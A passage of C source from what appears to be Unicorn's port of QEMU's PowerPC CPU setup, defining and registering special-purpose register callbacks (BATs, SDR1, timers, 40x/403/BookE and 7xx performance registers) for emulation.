tcg_gen_ld_tl(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env, offsetof(CPUPPCState, IBAT[sprn & 1][((sprn - SPR_IBAT4U) / 2) + 4])); } static void spr_write_ibatu(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, (sprn - SPR_IBAT0U) / 2); gen_helper_store_ibatu(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]); tcg_temp_free_i32(tcg_ctx, t0); } static void spr_write_ibatu_h(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, ((sprn - SPR_IBAT4U) / 2) + 4); gen_helper_store_ibatu(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]); tcg_temp_free_i32(tcg_ctx, t0); } static void spr_write_ibatl(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, (sprn - SPR_IBAT0L) / 2); gen_helper_store_ibatl(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]); tcg_temp_free_i32(tcg_ctx, t0); } static void spr_write_ibatl_h(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, ((sprn - SPR_IBAT4L) / 2) + 4); gen_helper_store_ibatl(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]); tcg_temp_free_i32(tcg_ctx, t0); } /* DBAT0U...DBAT7U */ /* DBAT0L...DBAT7L */ static void spr_read_dbat(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_ld_tl(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env, offsetof(CPUPPCState, DBAT[sprn & 1][(sprn - SPR_DBAT0U) / 2])); } static void spr_read_dbat_h(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_ld_tl(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env, offsetof(CPUPPCState, DBAT[sprn & 1][((sprn - SPR_DBAT4U) / 2) + 4])); } static void spr_write_dbatu(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, (sprn - SPR_DBAT0U) / 2); gen_helper_store_dbatu(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]); tcg_temp_free_i32(tcg_ctx, t0); } static void spr_write_dbatu_h(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, ((sprn - SPR_DBAT4U) / 2) + 4); gen_helper_store_dbatu(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]); tcg_temp_free_i32(tcg_ctx, t0); } static void spr_write_dbatl(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, (sprn - SPR_DBAT0L) / 2); gen_helper_store_dbatl(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]); tcg_temp_free_i32(tcg_ctx, t0); } static void spr_write_dbatl_h(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, ((sprn - SPR_DBAT4L) / 2) + 4); gen_helper_store_dbatl(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]); tcg_temp_free_i32(tcg_ctx, t0); } /* SDR1 */ static void spr_write_sdr1(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_sdr1(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } #if defined(TARGET_PPC64) /* 64 bits PowerPC specific SPRs */ /* PIDR */ static void spr_write_pidr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_pidr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } static void spr_write_lpidr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_lpidr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } static void spr_read_hior(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_ld_tl(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env, offsetof(CPUPPCState, excp_prefix)); } static void spr_write_hior(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[gprn], 0x3FFFFF00000ULL); tcg_gen_st_tl(tcg_ctx, t0, tcg_ctx->cpu_env, offsetof(CPUPPCState, excp_prefix)); tcg_temp_free(tcg_ctx, t0); } static void spr_write_ptcr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_ptcr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } static void spr_write_pcr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_pcr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } /* DPDES */ static void spr_read_dpdes(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_load_dpdes(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env); } static void spr_write_dpdes(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_dpdes(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } #endif /* PowerPC 601 specific registers */ /* RTC */ static void spr_read_601_rtcl(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_load_601_rtcl(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env); } static void spr_read_601_rtcu(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_load_601_rtcu(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env); } static void spr_write_601_rtcu(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_601_rtcu(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } static void spr_write_601_rtcl(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_601_rtcl(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } static void spr_write_hid0_601(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_hid0_601(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); /* Must stop the translation as endianness may have changed */ gen_stop_exception(ctx); } /* Unified bats */ static void spr_read_601_ubat(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_ld_tl(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env, offsetof(CPUPPCState, IBAT[sprn & 1][(sprn - SPR_IBAT0U) / 2])); } static void spr_write_601_ubatu(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, (sprn - SPR_IBAT0U) / 2); gen_helper_store_601_batl(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]); tcg_temp_free_i32(tcg_ctx, t0); } static void spr_write_601_ubatl(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, (sprn - SPR_IBAT0U) / 2); gen_helper_store_601_batu(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]); tcg_temp_free_i32(tcg_ctx, t0); } /* PowerPC 40x specific registers */ static void spr_read_40x_pit(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #ifdef UNICORN_ARCH_POSTFIX glue(gen_helper_load_40x_pit, UNICORN_ARCH_POSTFIX)(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env); #else gen_helper_load_40x_pit(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env); #endif } static void spr_write_40x_pit(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #ifdef UNICORN_ARCH_POSTFIX glue(gen_helper_store_40x_pit, UNICORN_ARCH_POSTFIX)(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); #else gen_helper_store_40x_pit(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); #endif } static void spr_write_40x_dbcr0(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_store_spr(tcg_ctx, sprn, cpu_gpr[gprn]); #ifdef UNICORN_ARCH_POSTFIX glue(gen_helper_store_40x_dbcr0, UNICORN_ARCH_POSTFIX)(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); #else gen_helper_store_40x_dbcr0(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); #endif /* We must stop translation as we may have rebooted */ gen_stop_exception(ctx); } static void spr_write_40x_sler(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #ifdef UNICORN_ARCH_POSTFIX glue(gen_helper_store_40x_sler, UNICORN_ARCH_POSTFIX)(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); #else gen_helper_store_40x_sler(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); #endif } static void spr_write_booke_tcr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_booke_tcr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } static void spr_write_booke_tsr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_booke_tsr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } /* PowerPC 403 specific registers */ /* PBL1 / PBU1 / PBL2 / PBU2 */ static void spr_read_403_pbr(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_ld_tl(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env, offsetof(CPUPPCState, pb[sprn - SPR_403_PBL1])); } static void spr_write_403_pbr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, sprn - SPR_403_PBL1); gen_helper_store_403_pbr(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]); tcg_temp_free_i32(tcg_ctx, t0); } static void spr_write_pir(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[gprn], 0xF); gen_store_spr(tcg_ctx, SPR_PIR, t0); tcg_temp_free(tcg_ctx, t0); } /* SPE specific registers */ static void spr_read_spefscr(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, t0, tcg_ctx->cpu_env, offsetof(CPUPPCState, spe_fscr)); tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[gprn], t0); tcg_temp_free_i32(tcg_ctx, t0); } static void spr_write_spefscr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[gprn]); tcg_gen_st_i32(tcg_ctx, t0, tcg_ctx->cpu_env, offsetof(CPUPPCState, spe_fscr)); tcg_temp_free_i32(tcg_ctx, t0); } /* Callback used to write the exception vector base */ static void spr_write_excp_prefix(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_ld_tl(tcg_ctx, t0, tcg_ctx->cpu_env, offsetof(CPUPPCState, ivpr_mask)); tcg_gen_and_tl(tcg_ctx, t0, t0, cpu_gpr[gprn]); tcg_gen_st_tl(tcg_ctx, t0, tcg_ctx->cpu_env, offsetof(CPUPPCState, excp_prefix)); gen_store_spr(tcg_ctx, sprn, t0); tcg_temp_free(tcg_ctx, t0); } static void spr_write_excp_vector(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int sprn_offs; if (sprn >= SPR_BOOKE_IVOR0 && sprn <= SPR_BOOKE_IVOR15) { sprn_offs = sprn - SPR_BOOKE_IVOR0; } else if (sprn >= SPR_BOOKE_IVOR32 && sprn <= SPR_BOOKE_IVOR37) { sprn_offs = sprn - SPR_BOOKE_IVOR32 + 32; } else if (sprn >= SPR_BOOKE_IVOR38 && sprn <= SPR_BOOKE_IVOR42) { sprn_offs = sprn - SPR_BOOKE_IVOR38 + 38; } else { printf("Trying to write an unknown exception vector %d %03x\n", sprn, sprn); gen_inval_exception(ctx, POWERPC_EXCP_PRIV_REG); return; } TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_ld_tl(tcg_ctx, t0, tcg_ctx->cpu_env, offsetof(CPUPPCState, ivor_mask)); tcg_gen_and_tl(tcg_ctx, t0, t0, cpu_gpr[gprn]); tcg_gen_st_tl(tcg_ctx, t0, tcg_ctx->cpu_env, offsetof(CPUPPCState, excp_vectors[sprn_offs])); gen_store_spr(tcg_ctx, sprn, t0); tcg_temp_free(tcg_ctx, t0); } static inline void vscr_init(CPUPPCState *env, uint32_t val) { /* Altivec always uses round-to-nearest */ set_float_rounding_mode(float_round_nearest_even, &env->vec_status); helper_mtvscr(env, val); } #define spr_register_kvm(env, num, name, uea_read, uea_write, \ oea_read, oea_write, one_reg_id, initial_value) \ _spr_register(env, num, name, uea_read, uea_write, \ oea_read, oea_write, oea_read, oea_write, initial_value) #define spr_register_kvm_hv(env, num, name, uea_read, uea_write, \ oea_read, oea_write, hea_read, hea_write, \ one_reg_id, initial_value) \ _spr_register(env, num, name, uea_read, uea_write, \ oea_read, oea_write, hea_read, hea_write, initial_value) #define spr_register(env, num, name, uea_read, uea_write, \ oea_read, oea_write, initial_value) \ spr_register_kvm(env, num, name, uea_read, uea_write, \ oea_read, oea_write, 0, initial_value) #define spr_register_hv(env, num, name, uea_read, uea_write, \ oea_read, oea_write, hea_read, hea_write, \ initial_value) \ spr_register_kvm_hv(env, num, name, uea_read, uea_write, \ oea_read, oea_write, hea_read, hea_write, \ 0, initial_value) static inline void _spr_register(CPUPPCState *env, int num, const char *name, void (*uea_read)(DisasContext *ctx, int gprn, int sprn), void (*uea_write)(DisasContext *ctx, int sprn, int gprn), void (*oea_read)(DisasContext *ctx, int gprn, int sprn), void (*oea_write)(DisasContext *ctx, int sprn, int gprn), void (*hea_read)(DisasContext *opaque, int gprn, int sprn), void (*hea_write)(DisasContext *opaque, int sprn, int gprn), #if defined(CONFIG_KVM) uint64_t one_reg_id, #endif target_ulong initial_value) { ppc_spr_t *spr; spr = &env->spr_cb[num]; if (spr->name != NULL || env->spr[num] != 0x00000000 || spr->oea_read != NULL || spr->oea_write != NULL || spr->uea_read != NULL || spr->uea_write != NULL) { printf("Error: Trying to register SPR %d (%03x) twice !\n", num, num); exit(1); } #if defined(PPC_DEBUG_SPR) printf("*** register spr %d (%03x) %s val " TARGET_FMT_lx "\n", num, num, name, initial_value); #endif spr->name = name; spr->uea_read = uea_read; spr->uea_write = uea_write; spr->oea_read = oea_read; spr->oea_write = oea_write; spr->hea_read = hea_read; spr->hea_write = hea_write; #if defined(CONFIG_KVM) spr->one_reg_id = one_reg_id, #endif env->spr[num] = spr->default_value = initial_value; } /* Generic PowerPC SPRs */ static void gen_spr_generic(CPUPPCState *env) { /* Integer processing */ spr_register(env, SPR_XER, "XER", &spr_read_xer, &spr_write_xer, &spr_read_xer, &spr_write_xer, 0x00000000); /* Branch contol */ spr_register(env, SPR_LR, "LR", &spr_read_lr, &spr_write_lr, &spr_read_lr, &spr_write_lr, 0x00000000); spr_register(env, SPR_CTR, "CTR", &spr_read_ctr, &spr_write_ctr, &spr_read_ctr, &spr_write_ctr, 0x00000000); /* Interrupt processing */ spr_register(env, SPR_SRR0, "SRR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_SRR1, "SRR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Processor control */ spr_register(env, SPR_SPRG0, "SPRG0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_SPRG1, "SPRG1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_SPRG2, "SPRG2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_SPRG3, "SPRG3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } /* SPR common to all non-embedded PowerPC, including 601 */ static void gen_spr_ne_601(CPUPPCState *env) { /* Exception processing */ spr_register_kvm(env, SPR_DSISR, "DSISR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_DSISR, 0x00000000); spr_register_kvm(env, SPR_DAR, "DAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_DAR, 0x00000000); /* Timer */ spr_register(env, SPR_DECR, "DECR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_decr, &spr_write_decr, 0x00000000); } /* Storage Description Register 1 */ static void gen_spr_sdr1(CPUPPCState *env) { if (env->has_hv_mode) { /* * SDR1 is a hypervisor resource on CPUs which have a * hypervisor mode */ spr_register_hv(env, SPR_SDR1, "SDR1", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_sdr1, 0x00000000); } else { spr_register(env, SPR_SDR1, "SDR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_sdr1, 0x00000000); } } /* BATs 0-3 */ static void gen_low_BATs(CPUPPCState *env) { spr_register(env, SPR_IBAT0U, "IBAT0U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat, &spr_write_ibatu, 0x00000000); spr_register(env, SPR_IBAT0L, "IBAT0L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat, &spr_write_ibatl, 0x00000000); spr_register(env, SPR_IBAT1U, "IBAT1U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat, &spr_write_ibatu, 0x00000000); spr_register(env, SPR_IBAT1L, "IBAT1L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat, &spr_write_ibatl, 0x00000000); spr_register(env, SPR_IBAT2U, "IBAT2U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat, &spr_write_ibatu, 0x00000000); spr_register(env, SPR_IBAT2L, "IBAT2L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat, &spr_write_ibatl, 0x00000000); spr_register(env, SPR_IBAT3U, "IBAT3U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat, &spr_write_ibatu, 0x00000000); spr_register(env, SPR_IBAT3L, "IBAT3L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat, &spr_write_ibatl, 0x00000000); spr_register(env, SPR_DBAT0U, "DBAT0U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat, &spr_write_dbatu, 0x00000000); spr_register(env, SPR_DBAT0L, "DBAT0L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat, &spr_write_dbatl, 0x00000000); spr_register(env, SPR_DBAT1U, "DBAT1U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat, &spr_write_dbatu, 0x00000000); spr_register(env, SPR_DBAT1L, "DBAT1L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat, &spr_write_dbatl, 0x00000000); spr_register(env, SPR_DBAT2U, "DBAT2U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat, &spr_write_dbatu, 0x00000000); spr_register(env, SPR_DBAT2L, "DBAT2L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat, &spr_write_dbatl, 0x00000000); spr_register(env, SPR_DBAT3U, "DBAT3U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat, &spr_write_dbatu, 0x00000000); spr_register(env, SPR_DBAT3L, "DBAT3L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat, &spr_write_dbatl, 0x00000000); env->nb_BATs += 4; } /* BATs 4-7 */ static void gen_high_BATs(CPUPPCState *env) { spr_register(env, SPR_IBAT4U, "IBAT4U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat_h, &spr_write_ibatu_h, 0x00000000); spr_register(env, SPR_IBAT4L, "IBAT4L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat_h, &spr_write_ibatl_h, 0x00000000); spr_register(env, SPR_IBAT5U, "IBAT5U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat_h, &spr_write_ibatu_h, 0x00000000); spr_register(env, SPR_IBAT5L, "IBAT5L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat_h, &spr_write_ibatl_h, 0x00000000); spr_register(env, SPR_IBAT6U, "IBAT6U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat_h, &spr_write_ibatu_h, 0x00000000); spr_register(env, SPR_IBAT6L, "IBAT6L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat_h, &spr_write_ibatl_h, 0x00000000); spr_register(env, SPR_IBAT7U, "IBAT7U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat_h, &spr_write_ibatu_h, 0x00000000); spr_register(env, SPR_IBAT7L, "IBAT7L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_ibat_h, &spr_write_ibatl_h, 0x00000000); spr_register(env, SPR_DBAT4U, "DBAT4U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat_h, &spr_write_dbatu_h, 0x00000000); spr_register(env, SPR_DBAT4L, "DBAT4L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat_h, &spr_write_dbatl_h, 0x00000000); spr_register(env, SPR_DBAT5U, "DBAT5U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat_h, &spr_write_dbatu_h, 0x00000000); spr_register(env, SPR_DBAT5L, "DBAT5L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat_h, &spr_write_dbatl_h, 0x00000000); spr_register(env, SPR_DBAT6U, "DBAT6U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat_h, &spr_write_dbatu_h, 0x00000000); spr_register(env, SPR_DBAT6L, "DBAT6L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat_h, &spr_write_dbatl_h, 0x00000000); spr_register(env, SPR_DBAT7U, "DBAT7U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat_h, &spr_write_dbatu_h, 0x00000000); spr_register(env, SPR_DBAT7L, "DBAT7L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_dbat_h, &spr_write_dbatl_h, 0x00000000); env->nb_BATs += 4; } /* Generic PowerPC time base */ static void gen_tbl(CPUPPCState *env) { spr_register(env, SPR_VTBL, "TBL", &spr_read_tbl, SPR_NOACCESS, &spr_read_tbl, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_TBL, "TBL", &spr_read_tbl, SPR_NOACCESS, &spr_read_tbl, &spr_write_tbl, 0x00000000); spr_register(env, SPR_VTBU, "TBU", &spr_read_tbu, SPR_NOACCESS, &spr_read_tbu, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_TBU, "TBU", &spr_read_tbu, SPR_NOACCESS, &spr_read_tbu, &spr_write_tbu, 0x00000000); } /* Softare table search registers */ static void gen_6xx_7xx_soft_tlb(CPUPPCState *env, int nb_tlbs, int nb_ways) { env->nb_tlb = nb_tlbs; env->nb_ways = nb_ways; env->id_tlbs = 1; env->tlb_type = TLB_6XX; spr_register(env, SPR_DMISS, "DMISS", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_DCMP, "DCMP", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_HASH1, "HASH1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_HASH2, "HASH2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_IMISS, "IMISS", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_ICMP, "ICMP", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_RPA, "RPA", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } /* SPR common to MPC755 and G2 */ static void gen_spr_G2_755(CPUPPCState *env) { /* SGPRs */ spr_register(env, SPR_SPRG4, "SPRG4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_SPRG5, "SPRG5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_SPRG6, "SPRG6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_SPRG7, "SPRG7", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } /* SPR common to all 7xx PowerPC implementations */ static void gen_spr_7xx(CPUPPCState *env) { /* Breakpoints */ /* XXX : not implemented */ spr_register_kvm(env, SPR_DABR, "DABR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_DABR, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_IABR, "IABR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Cache management */ /* XXX : not implemented */ spr_register(env, SPR_ICTC, "ICTC", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Performance monitors */ /* XXX : not implemented */ spr_register(env, SPR_7XX_MMCR0, "MMCR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_MMCR1, "MMCR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC1, "PMC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC2, "PMC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC3, "PMC3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC4, "PMC4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_SIAR, "SIAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UMMCR0, "UMMCR0", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UMMCR1, "UMMCR1", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC1, "UPMC1", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC2, "UPMC2", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC3, "UPMC3", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC4, "UPMC4", 